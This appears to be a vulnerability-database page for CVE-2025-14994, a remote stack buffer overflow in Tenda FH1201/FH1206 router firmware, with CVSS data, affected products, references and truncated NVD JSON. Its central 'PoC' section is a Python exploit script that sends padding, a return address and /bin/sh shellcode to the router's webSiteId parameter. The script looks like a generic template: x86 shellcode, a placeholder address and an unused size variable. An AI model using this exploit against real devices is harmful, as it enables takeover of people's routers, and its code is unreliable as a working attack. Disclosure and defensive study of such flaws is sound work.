CVE-2025-14994

Description

A flaw has been found in Tenda FH1201 and FH1206 1.2.0.14(408)/1.2.0.8(8155). This impacts the function strcat of the file /goform/webtypelibrary of the component HTTP Request Handler. This manipulation of the argument webSiteId causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:fh1201_firmware:1.2.0.14\(408\):*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:fh1201:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:tenda:fh1206_firmware:1.2.0.8\(8155\):*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:fh1206:-:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda FH1201 固件版本 1.2.0.14(408)

Tenda FH1206 固件版本 1.2.0.8(8155)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14994 PoC - Tenda FH1201/FH1206 Stack Buffer Overflow
# Target: /goform/webtypelibrary endpoint
# Vulnerability: Stack-based buffer overflow via webSiteId parameter

import requests
import sys

target_ip = sys.argv[1] if len(sys.argv) > 1 else '192.168.0.1'
target_port = 80

url = f'http://{target_ip}:{target_port}/goform/webtypelibrary'

# Create overflow payload with NOP sled and shellcode
# Stack pivot + reverse shell or custom payload
payload_size = 1000  # Adjust based on actual buffer size

# Padding to reach return address
padding = b'A' * 500

# Overwrite return address with address of NOP sled or system()
# Example: Point to gadget that executes system()
return_addr = b'\x08\x20\x40\x00'  # Example address, needs adjustment

# Shellcode for execve("/bin/sh", NULL, NULL)
shellcode = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'

# Construct full payload
exploit = padding + return_addr + shellcode

# Send malicious request
data = {
    'webSiteId': exploit
}

try:
    response = requests.post(url, data=data, timeout=5)
    print(f'[+] Request sent to {url}')
    print(f'[+] Payload size: {len(exploit)} bytes')
    print(f'[+] Response status: {response.status_code}')
except requests.exceptions.RequestException as e:
    print(f'[-] Error: {e}')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14994
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14994
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14994/
[4] VulDB https://vuldb.com/cve/CVE-2025-14994
[5] https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_FH1201/webtyplibrary/webtypelibrary.md
[6] https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_FH1206/webtyplibrary/webtypelibrary.md
[7] https://vuldb.com/?ctiid.337688
[8] https://vuldb.com/?id.337688
[9] https://vuldb.com/?submit.719153
[10] https://vuldb.com/?submit.719155
[11] https://www.tenda.com.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14994", "sourceIdentifier": "[email protected]", "published": "2025-12-21T08:15:49.767", "lastModified": "2025-12-31T15:40:06.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Tenda FH1201 and FH1206 1.2.0.14(408)/1.2.0.8(8155). This impacts the function strcat of the file /goform/webtypelibrary of the component HTTP Request Handler. This manipulation of the argument webSiteId causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:fh1201_firmware:1.2.0.14\\(408\\):*:*:*:*:*:*:*", "matchCriteriaId": "50F494B8-E1CA-4BA9-8A71-E519EB30CF41"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:fh1201:-:*:*:*:*:*:*:*", "matchCriteriaId": "67A1C59D-AE12-4410-9173-B9B9A72B3AE4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:fh1206_firmware:1.2.0.8\\(8155\\):*:*:*:*:*:*:*", "matchCriteriaId": "066BD21A-2694-474D-B885-6E9A2A1DBCFF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:fh1206:-:*:*:*:*:*:*:*", "matchCriteriaId": "1412759D-05ED-4D6C-93C3-FE59F6A1490E"}]}]}], "references": [{"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_FH1201/webtyplibrary/webtypelibrary.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_FH1206/webtyplibrary/webtypelibrary.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337688", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337688", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.719153", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb ... (truncated)